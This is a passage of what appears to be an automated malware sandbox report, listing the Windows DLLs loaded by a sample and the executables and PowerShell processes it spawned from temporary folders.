                              Source: C:\Users\user\Desktop\file.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: apphelp.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: winmm.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: wininet.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: winmm.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: wininet.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: winmm.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: wininet.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: sspicli.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: iertutil.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: windows.storage.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: wldp.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: profapi.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: winhttp.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: mswsock.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: iphlpapi.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: winnsi.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: urlmon.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: srvcli.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: netutils.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: uxtheme.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: propsys.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: edputil.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: wintypes.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: appresolver.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: bcp47langs.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: slc.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: userenv.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: sppc.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: apphelp.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1019663001\a2870b1ac5.exeSection loaded: apphelp.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1019664001\85746525a0.exeSection loaded: apphelp.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1019664001\85746525a0.exeSection loaded: cryptsp.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1019664001\85746525a0.exeSection loaded: windows.storage.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1019664001\85746525a0.exeSection loaded: wldp.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1019664001\85746525a0.exeSection loaded: winhttp.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1019664001\85746525a0.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1019664001\85746525a0.exeSection loaded: webio.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1019664001\85746525a0.exeSection loaded: mswsock.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1019664001\85746525a0.exeSection loaded: iphlpapi.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1019664001\85746525a0.exeSection loaded: winnsi.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1019664001\85746525a0.exeSection loaded: sspicli.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1019664001\85746525a0.exeSection loaded: dnsapi.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1019664001\85746525a0.exeSection loaded: rasadhlp.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1019664001\85746525a0.exeSection loaded: fwpuclnt.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1019664001\85746525a0.exeSection loaded: schannel.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1019664001\85746525a0.exeSection loaded: mskeyprotect.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1019664001\85746525a0.exeSection loaded: ntasn1.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1019664001\85746525a0.exeSection loaded: ncrypt.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1019664001\85746525a0.exeSection loaded: ncryptsslp.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1019664001\85746525a0.exeSection loaded: msasn1.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1019664001\85746525a0.exeSection loaded: cryptsp.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1019664001\85746525a0.exeSection loaded: rsaenh.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1019664001\85746525a0.exeSection loaded: cryptbase.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1019664001\85746525a0.exeSection loaded: gpapi.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1019664001\85746525a0.exeSection loaded: dpapi.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1019664001\85746525a0.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1019664001\85746525a0.exeSection loaded: uxtheme.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1019664001\85746525a0.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1019664001\85746525a0.exeSection loaded: wbemcomn.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1019664001\85746525a0.exeSection loaded: amsi.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1019664001\85746525a0.exeSection loaded: userenv.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1019664001\85746525a0.exeSection loaded: profapi.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1019664001\85746525a0.exeSection loaded: version.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1019664001\85746525a0.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1019664001\85746525a0.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1019664001\85746525a0.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1019664001\85746525a0.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1019664001\85746525a0.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1019664001\85746525a0.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1019667001\81d22383f9.exeSection loaded: mscoree.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1019667001\81d22383f9.exeSection loaded: apphelp.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1019667001\81d22383f9.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1019667001\81d22383f9.exeSection loaded: version.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1019667001\81d22383f9.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1019667001\81d22383f9.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1019667001\81d22383f9.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1019667001\81d22383f9.exeSection loaded: windows.storage.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1019667001\81d22383f9.exeSection loaded: wldp.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1019667001\81d22383f9.exeSection loaded: profapi.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1019667001\81d22383f9.exeSection loaded: cryptsp.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1019667001\81d22383f9.exeSection loaded: rsaenh.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1019667001\81d22383f9.exeSection loaded: cryptbase.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1019667001\81d22383f9.exeSection loaded: iphlpapi.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1019667001\81d22383f9.exeSection loaded: dnsapi.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1019667001\81d22383f9.exeSection loaded: dhcpcsvc6.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1019667001\81d22383f9.exeSection loaded: dhcpcsvc.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1019667001\81d22383f9.exeSection loaded: winnsi.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1019667001\81d22383f9.exeSection loaded: rasapi32.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1019667001\81d22383f9.exeSection loaded: rasman.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1019667001\81d22383f9.exeSection loaded: rtutils.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1019667001\81d22383f9.exeSection loaded: mswsock.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1019667001\81d22383f9.exeSection loaded: winhttp.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1019667001\81d22383f9.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1019667001\81d22383f9.exeSection loaded: rasadhlp.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1019667001\81d22383f9.exeSection loaded: fwpuclnt.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1019667001\81d22383f9.exeSection loaded: secur32.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1019667001\81d22383f9.exeSection loaded: sspicli.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1019667001\81d22383f9.exeSection loaded: schannel.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1019667001\81d22383f9.exeSection loaded: mskeyprotect.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1019667001\81d22383f9.exeSection loaded: ntasn1.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1019667001\81d22383f9.exeSection loaded: ncrypt.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1019667001\81d22383f9.exeSection loaded: ncryptsslp.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1019667001\81d22383f9.exeSection loaded: msasn1.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1019667001\81d22383f9.exeSection loaded: gpapi.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1019667001\81d22383f9.exeSection loaded: uxtheme.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1019667001\81d22383f9.exeSection loaded: propsys.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1019667001\81d22383f9.exeSection loaded: edputil.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1019667001\81d22383f9.exeSection loaded: urlmon.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1019667001\81d22383f9.exeSection loaded: iertutil.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1019667001\81d22383f9.exeSection loaded: srvcli.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1019667001\81d22383f9.exeSection loaded: netutils.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1019667001\81d22383f9.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1019667001\81d22383f9.exeSection loaded: wintypes.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1019667001\81d22383f9.exeSection loaded: appresolver.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1019667001\81d22383f9.exeSection loaded: bcp47langs.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1019667001\81d22383f9.exeSection loaded: slc.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1019667001\81d22383f9.exeSection loaded: userenv.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1019667001\81d22383f9.exeSection loaded: sppc.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1019667001\81d22383f9.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                              Source: C:\Users\user\AppData\Local\Temp\1019667001\81d22383f9.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                              Source: C:\Users\user\AppData\Local\Temp\1019668001\932bb971c3.exeSection loaded: apphelp.dll
                              Source: C:\Users\user\AppData\Local\Temp\1019668001\932bb971c3.exeSection loaded: winmm.dll
                              Source: C:\Users\user\AppData\Local\Temp\1019668001\932bb971c3.exeSection loaded: iphlpapi.dll
                              Source: C:\Users\user\AppData\Local\Temp\1019668001\932bb971c3.exeSection loaded: cryptbase.dll
                              Source: C:\Users\user\AppData\Local\Temp\1019668001\932bb971c3.exeSection loaded: cryptsp.dll
                              Source: C:\Users\user\AppData\Local\Temp\1019668001\932bb971c3.exeSection loaded: rsaenh.dll
                              Source: C:\Users\user\AppData\Local\Temp\1019668001\932bb971c3.exeSection loaded: dhcpcsvc6.dll
                              Source: C:\Users\user\AppData\Local\Temp\1019668001\932bb971c3.exeSection loaded: dhcpcsvc.dll
                              Source: C:\Users\user\AppData\Local\Temp\1019668001\932bb971c3.exeSection loaded: dnsapi.dll
                              Source: C:\Users\user\AppData\Local\Temp\1019668001\932bb971c3.exeSection loaded: napinsp.dll
                              Source: C:\Users\user\AppData\Local\Temp\1019668001\932bb971c3.exeSection loaded: pnrpnsp.dll
                              Source: C:\Users\user\AppData\Local\Temp\1019668001\932bb971c3.exeSection loaded: wshbth.dll
                              Source: C:\Users\user\AppData\Local\Temp\1019668001\932bb971c3.exeSection loaded: nlaapi.dll
                              Source: C:\Users\user\AppData\Local\Temp\1019668001\932bb971c3.exeSection loaded: mswsock.dll
                              Source: C:\Users\user\AppData\Local\Temp\1019668001\932bb971c3.exeSection loaded: winrnr.dll
                              Source: C:\Users\user\AppData\Local\Temp\1019668001\932bb971c3.exeSection loaded: uxtheme.dll
                              Source: C:\Users\user\AppData\Local\Temp\1019668001\932bb971c3.exeSection loaded: windows.storage.dll
                              Source: C:\Users\user\AppData\Local\Temp\1019668001\932bb971c3.exeSection loaded: wldp.dll
                              Source: C:\Users\user\AppData\Local\Temp\1019668001\932bb971c3.exeSection loaded: windowscodecs.dll
                              Source: C:\Users\user\AppData\Local\Temp\1019668001\932bb971c3.exeSection loaded: napinsp.dll
                              Source: C:\Users\user\AppData\Local\Temp\1019668001\932bb971c3.exeSection loaded: pnrpnsp.dll
                              Source: C:\Users\user\AppData\Local\Temp\1019668001\932bb971c3.exeSection loaded: wshbth.dll
                              Source: C:\Users\user\AppData\Local\Temp\1019668001\932bb971c3.exeSection loaded: nlaapi.dll
                              Source: C:\Users\user\AppData\Local\Temp\1019668001\932bb971c3.exeSection loaded: winrnr.dll
                              Source: C:\Users\user\AppData\Local\Temp\1019668001\932bb971c3.exeSection loaded: sspicli.dll
                              Source: C:\Users\user\AppData\Local\Temp\1019668001\932bb971c3.exeSection loaded: rstrtmgr.dll
                              Source: C:\Users\user\AppData\Local\Temp\1019668001\932bb971c3.exeSection loaded: ncrypt.dll
                              Source: C:\Users\user\AppData\Local\Temp\1019668001\932bb971c3.exeSection loaded: ntasn1.dll
                              Source: C:\Users\user\AppData\Local\Temp\1019668001\932bb971c3.exeSection loaded: dpapi.dll
                              Source: C:\Users\user\AppData\Local\Temp\1019669001\c9692f9101.exeSection loaded: apphelp.dll
                              Source: C:\Users\user\AppData\Local\Temp\1019669001\c9692f9101.exeSection loaded: winmm.dll
                              Source: C:\Users\user\AppData\Local\Temp\1019669001\c9692f9101.exeSection loaded: msimg32.dll
                              Source: C:\Users\user\AppData\Local\Temp\1019669001\c9692f9101.exeSection loaded: wininet.dll
                              Source: C:\Users\user\AppData\Local\Temp\1019669001\c9692f9101.exeSection loaded: msvcr100.dll
                              Source: C:\Users\user\AppData\Local\Temp\1019669001\c9692f9101.exeSection loaded: iertutil.dll
                              Source: C:\Users\user\AppData\Local\Temp\1019669001\c9692f9101.exeSection loaded: sspicli.dll
                              Source: C:\Users\user\AppData\Local\Temp\1019669001\c9692f9101.exeSection loaded: windows.storage.dll
                              Source: C:\Users\user\AppData\Local\Temp\1019669001\c9692f9101.exeSection loaded: wldp.dll
                              Source: C:\Users\user\AppData\Local\Temp\1019669001\c9692f9101.exeSection loaded: profapi.dll
                              Source: C:\Users\user\AppData\Local\Temp\1019669001\c9692f9101.exeSection loaded: kernel.appcore.dll
                              Source: C:\Users\user\AppData\Local\Temp\1019669001\c9692f9101.exeSection loaded: ondemandconnroutehelper.dll
                              Source: C:\Users\user\AppData\Local\Temp\1019669001\c9692f9101.exeSection loaded: winhttp.dll
                              Source: C:\Users\user\AppData\Local\Temp\1019669001\c9692f9101.exeSection loaded: mswsock.dll
                              Source: C:\Users\user\AppData\Local\Temp\1019669001\c9692f9101.exeSection loaded: iphlpapi.dll
                              Source: C:\Users\user\AppData\Local\Temp\1019669001\c9692f9101.exeSection loaded: winnsi.dll
                              Source: C:\Users\user\AppData\Local\Temp\1019669001\c9692f9101.exeSection loaded: urlmon.dll
                              Source: C:\Users\user\AppData\Local\Temp\1019669001\c9692f9101.exeSection loaded: srvcli.dll
                              Source: C:\Users\user\AppData\Local\Temp\1019669001\c9692f9101.exeSection loaded: netutils.dll
                              Source: C:\Users\user\AppData\Local\Temp\1019669001\c9692f9101.exeSection loaded: cryptsp.dll
                              Source: C:\Users\user\AppData\Local\Temp\1019669001\c9692f9101.exeSection loaded: rsaenh.dll
                              Source: C:\Users\user\AppData\Local\Temp\1019669001\c9692f9101.exeSection loaded: cryptbase.dll
                              Source: C:\Users\user\AppData\Local\Temp\1019669001\c9692f9101.exeSection loaded: uxtheme.dll
                              Source: C:\Users\user\AppData\Local\Temp\1019669001\c9692f9101.exeSection loaded: propsys.dll
                              Source: C:\Users\user\AppData\Local\Temp\1019669001\c9692f9101.exeSection loaded: linkinfo.dll
                              Source: C:\Users\user\AppData\Local\Temp\1019669001\c9692f9101.exeSection loaded: ntshrui.dll
                              Source: C:\Users\user\AppData\Local\Temp\1019669001\c9692f9101.exeSection loaded: cscapi.dll
                              Source: C:\agfznulwo\bb31c9d4a53941b6b913f33980d23feb.exeSection loaded: apphelp.dll
                              Source: C:\agfznulwo\bb31c9d4a53941b6b913f33980d23feb.exeSection loaded: sspicli.dll
                              Source: C:\agfznulwo\bb31c9d4a53941b6b913f33980d23feb.exeSection loaded: wininet.dll
                              Source: C:\agfznulwo\bb31c9d4a53941b6b913f33980d23feb.exeSection loaded: rstrtmgr.dll
                              Source: C:\agfznulwo\bb31c9d4a53941b6b913f33980d23feb.exeSection loaded: ncrypt.dll
                              Source: C:\agfznulwo\bb31c9d4a53941b6b913f33980d23feb.exeSection loaded: ntasn1.dll
                              Source: C:\agfznulwo\bb31c9d4a53941b6b913f33980d23feb.exeSection loaded: dbghelp.dll
                              Source: C:\agfznulwo\bb31c9d4a53941b6b913f33980d23feb.exeSection loaded: iertutil.dll
                              Source: C:\agfznulwo\bb31c9d4a53941b6b913f33980d23feb.exeSection loaded: windows.storage.dll
                              Source: C:\agfznulwo\bb31c9d4a53941b6b913f33980d23feb.exeSection loaded: wldp.dll
